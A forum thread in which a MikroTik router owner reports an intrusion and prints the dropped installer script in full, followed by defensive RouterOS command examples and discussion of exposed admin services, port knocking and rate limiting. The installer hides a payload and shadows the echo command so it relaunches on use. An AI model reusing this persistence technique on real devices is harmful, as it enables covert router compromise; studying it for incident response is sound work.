Community discussions
aguntukk
newbie
Topic Author
Posts: 49
Joined: Thu Jul 10, 2014 2:37 pm

Mikrotik vulnerability

Sat Apr 21, 2018 12:37 pm

I noticed today an unusual login to my router, and it created a file in the RouterOS Files list (attached).
First somebody logged in from 103.1.221.39, and somehow they cracked my password. Please check the attached image. After that they enabled SSH and Telnet.

I upgraded the router to the latest bugfix, 6.40.7.

It's a very serious issue.
I got a file save.sh in Files:
#!/bin/ash
# (The comments in this listing are editorial annotations added to the file as posted;
#  the dropped script itself contained no comments. Behaviour is unchanged.)

# Pick the install directory: /usr/local/bin on older RouterOS builds,
# /flash/bin otherwise; give up if there is no /flash at all.
case "$PATH" in
*/usr/local/bin*)
# old versions
dest="/usr/local/bin/"
;;
*)
dest="/flash/bin/"
if [ ! -d "/flash/" ]; then
exit 1
fi
;;
esac

# Remove leftovers from an earlier run.
if [ -f $dest/.dnstest ]; then
rm $dest/.dnstest
fi
if [ -f $dest/echo ]; then
rm $dest/echo
fi
if [ -f $dest/.test ]; then
rm $dest/.test
fi

mkdir -p $dest

# Put the install directory on PATH so the "echo" wrapper below gets found.
export PATH=$PATH:$dest
# The real payload was uploaded as /flash/rw/pckg/dnstest; make it executable and stash a hidden copy.
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest

# .test: sleep 180 s (usleep takes microseconds), copy the payload to /tmp and run it.
echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
chmod +x $dest/.test

# Persistence: shadow "echo" with a wrapper that launches .test in the background
# and then calls the real /bin/echo, so any script that runs echo re-launches the payload.
echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo \$*" > $dest/echo
chmod +x $dest/echo
# Run the payload once now and delete this installer.
/flash/rw/pckg/dnstest
rm save.sh

routeros vulnerable.jpg
 
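The checks a responder would run against the indicators in the post above (an unexpected file in Files, SSH and Telnet switched on, a login from an address that is not yours). This is an added example, not something posted in the thread; the file name and the 103.1.221.39 address come from the post, the service names and the password placeholder are assumptions.

```routeros
# Added example: RouterOS terminal commands to confirm the indicators in the post.
# Read-only until the "contain" section at the end.

# 1. Dropped files. The post found "save.sh" in Files; list everything, other
#    files may have been dropped as well.
/file print detail

# 2. Management services. The post says SSH and Telnet were turned on.
/ip service print

# 3. Logins. The post's screenshot showed a login from 103.1.221.39.
/log print where message~"logged in"
/log print where message~"103.1.221.39"

# 4. Persistence an intruder with admin rights could have added from the CLI.
/user print
/user active print
/system scheduler print detail
/system script print detail

# 5. Contain (assumed: you do not use telnet/ftp/www/api; set a new strong password).
/ip service set telnet disabled=yes
/ip service set ftp disabled=yes
/ip service set www disabled=yes
/ip service set api disabled=yes
/user set admin password="replace-with-a-long-random-password"
```

Caveat: the save.sh in the post copies its payload below /flash/bin, which is the underlying filesystem and is not visible from the RouterOS shell, so a clean `/file print` does not prove the box is clean. Once a file like that has run, reinstall the router with Netinstall and restore a configuration you have reviewed rather than trusting an in-place cleanup.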
pe1chl
Forum Guru
Posts: 6784
Joined: Mon Jun 08, 2015 12:09 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 12:41 pm

You should not allow login to your router from the internet! Fix your firewall configuration...
 
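What "fix your firewall configuration" looks like on RouterOS, as an added example that is not from the post: management is reachable only from an address list, unused services are disabled, and the service itself is bound to the same addresses as a second layer. The addresses, the list name and the WAN interface name ether1 are assumptions; replace them with your own.

```routeros
# Added example: restrict router management to known sources.
# Assumed values: 192.168.88.0/24 is the LAN, 203.0.113.10 is the admin's fixed
# public address, ether1 is the WAN interface.

/ip firewall address-list
add list=mgmt address=192.168.88.0/24 comment="LAN admins"
add list=mgmt address=203.0.113.10 comment="admin, fixed public address"

# Services that are not needed are turned off; the rest are bound to the same
# sources so that a firewall mistake alone does not expose them.
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set api disabled=yes
set api-ssl disabled=yes
set ssh address=192.168.88.0/24,203.0.113.10
set winbox address=192.168.88.0/24,203.0.113.10
set www-ssl address=192.168.88.0/24,203.0.113.10

# Input chain: replies first, then management from the list, then drop the
# rest of what arrives on the WAN interface.
/ip firewall filter
add chain=input connection-state=established,related action=accept comment="replies to the router's own traffic"
add chain=input connection-state=invalid action=drop
add chain=input src-address-list=mgmt protocol=tcp dst-port=22,443,8291 action=accept comment="ssh/https/winbox from mgmt only"
add chain=input in-interface=ether1 action=drop comment="everything else from WAN"
```

`add` appends to the end of the chain, so if the router already has input rules, check `/ip firewall filter print` and use `place-before=` to put the accept rule ahead of any existing drop. The final drop also blocks any other service you might be running on the WAN side (e.g. a VPN endpoint); add an explicit accept for that before it.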
eddieb
Member Candidate
Posts: 173
Joined: Thu Aug 28, 2014 10:53 am
Location: Netherlands

Re: Mikrotik vulnerability

Sat Apr 21, 2018 12:43 pm

Problems like this should be reported directly to support@mikrotik.com.
NEVER allow management on your devices from the internet. Fix your firewall.
Pick a strong password; it took only 3 seconds according to your log ...
Running 6.47 (stable) on :
CCR1009-8G-1S (2x ipsec/l2tp site-to-site, ipsec/l2tp roadwarrior, dhcpd, dns), CRS125-24G-1S, RB1100, RB962UiGS-5HacT2HnT (10pc), RB931-2nD, RB951, RB750GL ,RB2011UAS-RM, RB750Gr3 running dude
 
manuzoli
Frequent Visitor
Posts: 78
Joined: Mon Oct 03, 2016 6:47 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 1:50 pm

Seems you are not the only one.
viewtopic.php?f=2&t=133438&p=655824
 
Sob
Forum Guru
Posts: 5700
Joined: Mon Apr 20, 2009 9:11 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 2:37 pm

You should not allow login to your router from the internet! Fix your firewall configuration...
What if I need the ability to log in to the router from any random address (travelling admin)? Shouldn't a non-standard username and super-strong password be secure enough? Disabling everything might be secure, but not always very practical. Another option is VPN, but when I need to make it accessible from anywhere, in principle it's exactly the same problem; it too can have some nasty vulnerability.
People who quote full posts should be spanked with ethernet cable. Some exceptions for multi-topic threads may apply. Not intended as incentive for masochists.
 
mkx
Forum Guru
Posts: 4472
Joined: Thu Mar 03, 2016 10:23 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 4:10 pm

It's been said a long time ago: the only secure network is the one without a connection to other networks (nowadays that means no internet) and with full physical security.
This, of course, leaves out legitimate but malicious users. And stupid users; I wonder which ones do more harm.

Security and ease of use are almost inversely proportional and one has to compromise between the two.
BR,
Metod
 
squeeze
Member Candidate
Posts: 146
Joined: Thu Mar 22, 2018 7:53 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 4:46 pm

You should not allow login to your router from the internet! Fix your firewall configuration...
What if I need the ability to log in to the router from any random address (travelling admin)? Shouldn't a non-standard username and super-strong password be secure enough? Disabling everything might be secure, but not always very practical. Another option is VPN, but when I need to make it accessible from anywhere, in principle it's exactly the same problem; it too can have some nasty vulnerability.

If there were viable remote vulnerabilities for VPNs or tunnels like SSH, it would be headline news. Since they are so widely used for so many purposes, for so long, and specifically designed for the job, they are about as mature and secure as it is possible to be for networking protocols. They are international standards. So much of the security effort comes embedded within the protocol and is not hand-rolled by one or a handful of individuals at one company. Also, they tend to have a lot of supporting tools available.

Something you can also use, equally with VPNs as you can with bare ordinary services, is port knocking. I think there are a couple of tutorials around the forums for how to achieve this with Mikrotik gear. With properly configured port knocking, attackers have no reasonable chance of even seeing desired services remotely.
 
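The port-knocking pattern the post above refers to, written out as an added example (not taken from the post or from a MikroTik tutorial): two knock ports in a fixed order populate temporary address lists, and only a source that is on the final list gets to the WinBox port. The knock ports 1001 and 2002, the list names and the timeouts are assumptions; choose your own and treat them as a secret.

```routeros
# Added example: two-step port knock in front of WinBox (8291).
# Assumed: knock ports 1001 then 2002, lists knock1 and knocked, no other
# input rules ahead of these (otherwise use place-before=).

/ip firewall filter
# Step 1: any SYN to port 1001 puts the source on knock1 for 15 seconds.
add chain=input protocol=tcp dst-port=1001 action=add-src-to-address-list address-list=knock1 address-list-timeout=15s comment="knock 1"
# Step 2: port 2002 only counts if the source is already on knock1; it is then
# allowed in for 10 minutes.
add chain=input protocol=tcp dst-port=2002 src-address-list=knock1 action=add-src-to-address-list address-list=knocked address-list-timeout=10m comment="knock 2"
# WinBox is reachable only from sources that completed the sequence.
add chain=input protocol=tcp dst-port=8291 src-address-list=knocked action=accept comment="winbox after correct knock"
add chain=input protocol=tcp dst-port=8291 action=drop comment="winbox for everyone else"
```

From the client, the knock is just two TCP connection attempts (for example `nc -z <router> 1001` followed by `nc -z <router> 2002`) within 15 seconds, then a normal WinBox login. Two things to keep in mind: the knock travels in the clear, so anyone who can see your traffic can replay it, and a knock is not authentication; it only keeps the service out of sight of scanners, so the strong password (or a VPN) is still what protects the login.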
anav
Forum Guru
Posts: 4800
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Mikrotik vulnerability

Sat Apr 21, 2018 5:51 pm

Perhaps MikroTik should consider building in the use of a rolling code device that works with Winbox. Businesses are now using this (a rolling code device or RSA app, for example) for protection on local, within-the-premises computers, and VPN for any external access. Not providing at least the above for admin access is perhaps a gap to be rectified.
Winbox should not necessarily be a fixed port, and I wondered why I don't have the opportunity to change it.
My current router allows HTTPS from a non-standard port, for example (of my choosing).

However, don't blame the router vendor for piss-poor security practices by the user, be it an easy password, not changing admin to some other user name, etc.....
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)
 
anav
Forum Guru
Posts: 4800
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Mikrotik vulnerability

Sat Apr 21, 2018 5:55 pm

You should not allow login to your router from the internet! Fix your firewall configuration...
What if I need the ability to log in to the router from any random address (travelling admin)? Shouldn't a non-standard username and super-strong password be secure enough? Disabling everything might be secure, but not always very practical. Another option is VPN, but when I need to make it accessible from anywhere, in principle it's exactly the same problem; it too can have some nasty vulnerability.
Are you kidding me?? All the more reason, and advice given freely everywhere, that non-secure locations connecting to a business account require PKI, VPN, rolling code or some type of extra layer of security over simply name and password. Heck, I have Avast SecureMe and a VPN service on my cell phone for when I use other people's WiFi. One would think it would be even more stringent for admin access.
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)
 
mrtester
just joined
Posts: 9
Joined: Sat Dec 23, 2017 11:09 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 6:03 pm

On which version did you have the original problem?
Sounds like the problem which was already resolved a long time ago, and recently there was a special announcement from the MikroTik team about that. If I remember correctly, versions before 6.38.5 were affected.
 
anav
Forum Guru
Posts: 4800
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Mikrotik vulnerability

Sat Apr 21, 2018 6:10 pm

On which version did you have the original problem?
Sounds like the problem which was already resolved a long time ago, and recently there was a special announcement from the MikroTik team about that. If I remember correctly, versions before 6.38.5 were affected.
This! We don't have enough information from the OP to make a determination. If the admin name is still admin and the default password has not been changed or is 1234, and the Winbox port is wide open to the outside (not even IP-limited), it wouldn't matter what version of software is being used.
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)
 
CZFan
Forum Guru
Posts: 1732
Joined: Sun Oct 09, 2016 8:25 pm
Location: South Africa, Randburg

Re: Mikrotik vulnerability

Sat Apr 21, 2018 6:12 pm

On which version did you have the original problem?
Sounds like the problem which was already resolved a long time ago, and recently there was a special announcement from the MikroTik team about that. If I remember correctly, versions before 6.38.5 were affected.

It also happened on 6.41.3, see viewtopic.php?f=2&t=133438&p=655824
MTCNA, MTCTCE, MTCRE & MTCINE
 
Sob
Forum Guru
Posts: 5700
Joined: Mon Apr 20, 2009 9:11 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 6:42 pm

@squeeze: VPNs as a whole are probably secure. But even a well-designed protocol can be implemented wrong. And without trying to insinuate anything, MikroTik likes to implement its own stuff, so you never know what might happen. I don't feel in danger with exposed VPNs on RouterOS. But if I was just a little less paranoid, I wouldn't feel in danger even with an exposed WinBox port, with some reasonable precautions (e.g. a password like "s%&GhVV@)3EkM2N@\g5:" and some rate limiting for login attempts) - good luck getting through (unless you cheat and use some vulnerability :)).

@anav: That was completely serious question. There are different levels of admin access, from simple home router, through company router, to nuclear facility (ok, now I might be kidding). And strong password should be ok for the lower levels.
Winbox should not necessarily be a fixed port and wondered why I dont have the opportunity to change it.
You can, see IP->Services.
My current router allows HTTPS from a non-standard port for example (of my choosing).
If you mean that you just moved HTTPS WebFig to a non-standard port, but still have it accessible from everywhere, then you're not much safer. It's better than the default port, where it takes only one attempt to check if the admin interface is there, but checking 65k ports is not that much harder.
People who quote full posts should be spanked with ethernet cable. Some exceptions for multi-topic threads may apply. Not intended as incentive for masochists.
 
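The "rate limiting for login attempts" and "moved to a non-standard port" points in the post above, as one added example that is not from the post: the WinBox port is moved (which, as the post says, only costs a scanner a few more probes), and a staged address-list chain locks a source out for a day after four new connections within a minute. The port 58291, the thresholds, the list names and the mgmt address list are assumptions.

```routeros
# Added example: connection-rate lockout for WinBox on a moved port.
# Assumed: port 58291, an existing address list "mgmt" of known admin sources,
# four new connections per minute is the lockout threshold.

/ip service set winbox port=58291

/ip firewall filter
# Known admins skip the counters; otherwise a quick reconnect locks you out too.
add chain=input protocol=tcp dst-port=58291 src-address-list=mgmt action=accept comment="known admins bypass lockout"
# Already locked out: drop.
add chain=input protocol=tcp dst-port=58291 src-address-list=winbox_blacklist action=drop comment="locked out for 1 day"
# add-src-to-address-list does not stop rule processing, so each new connection
# advances the source one stage: stage1 -> stage2 -> stage3 -> blacklist.
add chain=input protocol=tcp dst-port=58291 connection-state=new src-address-list=winbox_stage3 action=add-src-to-address-list address-list=winbox_blacklist address-list-timeout=1d comment="4th new connection within a minute"
add chain=input protocol=tcp dst-port=58291 connection-state=new src-address-list=winbox_stage2 action=add-src-to-address-list address-list=winbox_stage3 address-list-timeout=1m
add chain=input protocol=tcp dst-port=58291 connection-state=new src-address-list=winbox_stage1 action=add-src-to-address-list address-list=winbox_stage2 address-list-timeout=1m
add chain=input protocol=tcp dst-port=58291 connection-state=new action=add-src-to-address-list address-list=winbox_stage1 address-list-timeout=1m
add chain=input protocol=tcp dst-port=58291 connection-state=new action=accept comment="below threshold"
```

The stage rules must be in exactly this order (stage3 before stage2 before stage1 before the unconditional one), otherwise a single connection walks straight through all stages. The counter is on new TCP connections, not on failed logins, so it also slows down anyone probing whether the port answers; inspect the lists with `/ip firewall address-list print where list~"winbox"`. This limits guessing speed; it does nothing against an actual vulnerability in the service, which is why the post still puts a VPN in front for anything that matters.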
anav
Forum Guru
Posts: 4800
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Mikrotik vulnerability

Sat Apr 21, 2018 6:50 pm

True enough, Sob, but for the lower levels one may easily assume Winbox is secure enough. This assumption appears false. The fact that there is obviously some sort of bug that allows such a targeted penetration very quickly, so much so that it looks like they can do it at will, is very alarming. I have not exposed Winbox or any other port, but was considering it and decided that I would be more comfortable within a VPN. By the way, my HTTPS access for the current router is for internal access only. As a home owner I haven't found the need for external admin access yet.

For a homeowner a secure Winbox and good password should deter most, as hacking is based primarily on EASE (hackers for fun) and then on SOMETHING OF VALUE (professional/state hackers for $$ or criminal activity etc.). However, if it is easy to hack Winbox then the homeowner is now vulnerable to the hackers-for-fun crowd. For those concerned in the latter category, I imagine all use more layers including VPN. Just saying that MikroTik should add rolling code capability to Winbox or something like that, as they continue to fail to nail it down sufficiently for the homeowner.

Does 6.42 close this security problem???
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)
 
Sob
Forum Guru
Posts: 5700
Joined: Mon Apr 20, 2009 9:11 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 7:42 pm

Just saying that mikrotik should add rolling code capability to WInbox or something like that ...
The two-factor approach seems to be popular, so they could add that. E.g. a code compatible with Google Authenticator (don't be discouraged by the name, it doesn't depend on Google at all; it's just that they made the application based on a standard).
Does 6.42 close this security problem???
It's completely new, it wasn't even confirmed (or disproved) by MikroTik yet.
People who quote full posts should be spanked with ethernet cable. Some exceptions for multi-topic threads may apply. Not intended as incentive for masochists.
 
pe1chl
Forum Guru
Posts: 6784
Joined: Mon Jun 08, 2015 12:09 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 8:13 pm

Probably again some kind of worm. I traced incoming port 8291 connects, telnetted back to a couple of them, and got a RouterOS login prompt on many.
Scary, because it could spread inside a network with a firewall once it somehow gets in at some point, when access to Winbox is allowed from all inside addresses.
Last edited by pe1chl on Sat Apr 21, 2018 8:16 pm, edited 1 time in total.
 
squeeze
Member Candidate
Posts: 146
Joined: Thu Mar 22, 2018 7:53 pm

Re: Mikrotik vulnerability

Sat Apr 21, 2018 8:15 pm

Winbox should not necessarily be a fixed port, and I wondered why I don't have the opportunity to change it.
My current router allows HTTPS from a non-standard port, for example (of my choosing).

You can trivially change the port in the Winbox client just by appending the usual port number as in other TCP applications, i.e. 123.123.123.123:1234. You can change the port for all the running services in RouterOS under IP > Services.

A little less panic would also be welcome, because not only has MikroTik not confirmed the vulnerability, but nowhere has anyone published or indicated how this alleged vulnerability actually occurs. With most other vulnerabilities, the first you hear of them is from a security researcher, a leak of a 0-day's details, or the manufacturer's fixes.
